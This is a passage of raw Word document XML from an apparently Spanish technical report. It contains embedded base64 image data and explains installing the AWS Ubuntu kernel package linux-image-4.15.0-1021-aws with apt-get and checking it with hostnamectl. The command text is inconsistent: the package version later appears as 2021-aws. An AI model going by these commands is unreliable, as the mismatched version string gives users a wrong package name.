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&#10;limIYK+SNAFxVJBkWQayLOTtgPI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gZyCmm8DAADlBwAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAKAAAAAAAAACEA/mvH2khAAABIQAAAFAAAAAAAAAAAAAAAAADVBQAAZHJzL21lZGlhL2ltYWdl&#10;MS5wbmdQSwECLQAUAAYACAAAACEATKGk498AAAAIAQAADwAAAAAAAAAAAAAAAABPRgAAZHJzL2Rv&#10;d25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAAW0cAAGRy&#10;cy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAATkgAAAAA&#10;">
                <v:shape id="Imagen 12" o:spid="_x0000_s1059" type="#_x0000_t75" style="position:absolute;width:34328;height:14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5hdxgAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/fasIw&#10;FMbvhb1DOANvZKa1UEJnlLEhyO5s9wBnzbEpNielybTu6ZeLgZcf3z9+2/3sBnGlKfSeNeTrDARx&#10;603PnYav5vCiQISIbHDwTBruFGC/e1pssTL+xie61rETaYRDhRpsjGMlZWgtOQxrPxIn7+wnhzHJ&#10;qZNmwlsad4PcZFkpHfacHiyO9G6pvdQ/TkO3+siVtarB0nPdhM/4+90brZfP89sriEhzfIT/20ej&#10;YZOroigLlSASUsIBufsDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA6a+YXcYAAADiAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId118" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1060" type="#_x0000_t202" style="position:absolute;left:35712;top:3795;width:18282;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1J/ywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6KboxlWBSV7HaQg960IrnR/aZBLNvw+5q4r/vFgo9DjPzDTNfDqYVN3K+saxgMk5A&#10;EJdWN1wpOH5/jmYgfEDW2FomBXfysFw8Psyx0LbnPd0OoRIRwr5ABXUIXSGlL2sy6Me2I47e2TqD&#10;IUpXSe2wj3DTyjRJMmmw4bhQY0frmsrL4WoUZBt37fe8ftkcP7a466r09H4/KfX8NKzeQAQawn/4&#10;r/2lFeTT/HWW5ekUfi/FOyAXPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCH61J/ywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="38D613A3" w14:textId="220DC4A4" w:rsidR="00C04AFA" w:rsidRPr="00B26F88" w:rsidRDefault="00C04AFA" w:rsidP="00C04AFA">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>14</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="46" w:name="_Toc155782581"/>
                        <w:r w:rsidRPr="00F1650C">
                          <w:t>Procediendo a descargar</w:t>
                        </w:r>
                        <w:r>
                          <w:t xml:space="preserve"> kernel de aws</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00F1650C">
                          <w:t>.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="46"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Como podemos observar en la imagen observada, el primer kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que buscamos exactamente aparece como </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linux-image-4.15.0-1021-aws</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, significa que es un kernel disponible para ser instalado en el sistema operativo, por lo que procederemos a su instalación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00403D77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo apt-get install linux-image-4.15.0-1021-aws</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBECF06" w14:textId="1C8BB107" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El comando </w:t>
      </w:r>
      <w:r w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo apt-get install linux-image-4.15.0-2021-aws</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o sistemas basados en Debian, se utiliza para instalar una versión específica del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">de Linux, diseñada para ambientes </w:t>
      </w:r>
      <w:r w:rsidRPr="00A5627C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Al usar </w:t>
      </w:r>
      <w:r w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, el comando se ejecuta con privilegios de superusuario, necesarios para instalar software a nivel de sistema. </w:t>
      </w:r>
      <w:r w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>apt-get install</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es parte del sistema de gestión de paquetes APT, y se usa aquí para instalar el paquete </w:t>
      </w:r>
      <w:r w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux-image-4.15.0-2021-aws</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Este paquete contiene una imagen del kernel de Linux, la cual está optimizada para correr en servidores </w:t>
      </w:r>
      <w:r w:rsidRPr="00A5627C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicando que este kernel podría tener configuraciones o parches específicos para un rendimiento mejorado o características adicionales en esa plataforma. </w:t>
      </w:r>
      <w:r w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al instalar un nuevo kernel, es importante reiniciar el sistema para que empiece a usar esta nueva versión.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Para comprobar lo mencionado anteriormente, procederemos a realizar de nuevo el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>hostnamectl</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48618415" w14:textId="4B780DF6" w:rsidR="009B1250" w:rsidRDefault="002F18FA" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="416EBAD4" wp14:editId="1DF63D94">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-49853</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>512685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5398770" cy="1776730"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1260106032" name="Grupo 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5398770" cy="1776730"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5398797" cy="1776730"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="607515910" name="Imagen 13" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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232150" cy="1776730"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1517705190" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3364257" y="759125"/>
                            <a:ext cx="2034540" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0D5E25DB" w14:textId="52F05F0A" w:rsidR="00C04AFA" w:rsidRPr="004933D7" w:rsidRDefault="00C04AFA" w:rsidP="00C04AFA">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>15</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="47" w:name="_Toc155782582"/>
                              <w:r w:rsidRPr="004B562F">
                                <w:t>Comprobando que el kernel aún no está instalado.</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6EBAD4" id="Grupo 5" o:spid="_x0000_s1061" style="position:absolute;left:0;text-align:left;margin-left:-3.95pt;margin-top:40.35pt;width:425.1pt;height:139.9pt;z-index:251716608;mso-position-horizontal-relative:margin" coordsize="53987,17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